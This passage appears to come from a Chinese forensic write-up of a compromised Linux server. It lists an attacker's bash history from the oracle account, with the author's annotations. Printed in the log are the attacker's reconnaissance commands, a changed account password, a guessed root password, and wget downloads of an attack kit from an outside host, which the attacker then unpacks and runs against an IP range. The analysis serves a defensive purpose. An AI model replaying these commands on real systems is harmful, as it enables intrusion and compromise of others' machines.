下面看看黑客用oracle账户都做了什么。首先复制一份oracle的命令历史,防止后续操作丢失该记录。
- cp /home/oracle/.bash_history hacker_history
然后查看分析这个文件。 我在后面备注了黑客的想法。
- vi .bash_profile
- vi .bash_profile (查看.bash_profile,看变量设置,把/home/oracle/bin增加到PATH)
- ll
- cd /
- vi .bash_profile
- vi .bash_profile (执行,设置环境变量)
- w
- ps x (查看系统运行进程)
- free -m (查看内存大小)
- uname -a (查看系统版本)
- cat /etc/issue (查看系统发行版)
- cat /etc/hosts (查看是否有网内机器)
- cat /proc/cpuinfo (查看CPU型号)
- cat .bash_history (查看oracle账户历史操作)
- w (查看系统负载)
- ls -a (查看/home/oracle/下的隐藏文件)
- passwd (修改掉oracle账户的密码)
- exit
- ls
- oracle
- sqlplus (运行sqlplus)
- su (试图切换到root账户)
- app1123456 (猜测root密码)
- ls
- su -
- w
- free -m
- php -v (查看php版本)
- exit
- w
- free -m
- php -v
- ps aux
- ls -a
- exit
- w
- free -m
- php -v
- cat bash_his (查看历史命令)
- cat bash_history
- cat .bash_history
- wget scriptcoders.ucoz.com/piata.tgz (下载肉鸡攻击软件包)
- tar zxvf piata.tgz (解压软件包)
- rm -rf piata.tgz (删除软件包)
- cd piata/ (切换到攻击软件目录)
- ls -a
- chmod +x *
- ./a 210.212 (运行攻击软件)
- screen (试图运行screen命令,发现没有后下载它)
- ls -a
- wget scriptcoders.ucoz.com/screen.tgz
- tar zxvf screen.tgz (解压)
- ./screen
- exit
- w
- ps x
- cd piata/ (切换到攻击软件目录)
- ls -a
- cat vuln.txt (查看攻击结果)
- ls -a
- mv vuln.txt 1.txt (保存攻击结果)
- ./screen -r
- nano 1.txt (查看结果文件)
- w
- ps x
- exit
- cd piata
- ps x
- ls -a
- nano 2.txt
- exit
- w
- ps x
- cd piata/
- ls -a
- cat
- mv vuln.txt 2.txt (保存结果)
- nano 2.txt
- w
- ps x
- cd piata/
- ls- a
- cat vuln.txt
- rm -rf vuln.txt
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- ls -a
- mv vuln.txt 3.txt (保存结果)
- nano 3.txt
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- rm -rf vuln.txt
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- rm -rf vuln.txt
- rm -rf 1.txt
- rm -rf 2.txt
- rm -rf 2.txt.save
- rm -rf 3.txt
- screen -r
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- ls -a
- nano vuln.txt
- rm -rf vuln.txt
- screen -r
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- nano vuln.txt
- w
- ls -a
- rm -rf vuln.txt
- screen -r
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- rm -rf vuln.txt
- ps x
- ls -a
- ./screen -r
- exit
- w
- ps x
- cd piata/
- ls -a
- cat vuln.txt
- nano vuln.txt
- w
- rm -rf vuln.txt
- ./screen -r
- exit
3.3 攻击工具一览 (编辑:好传媒网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|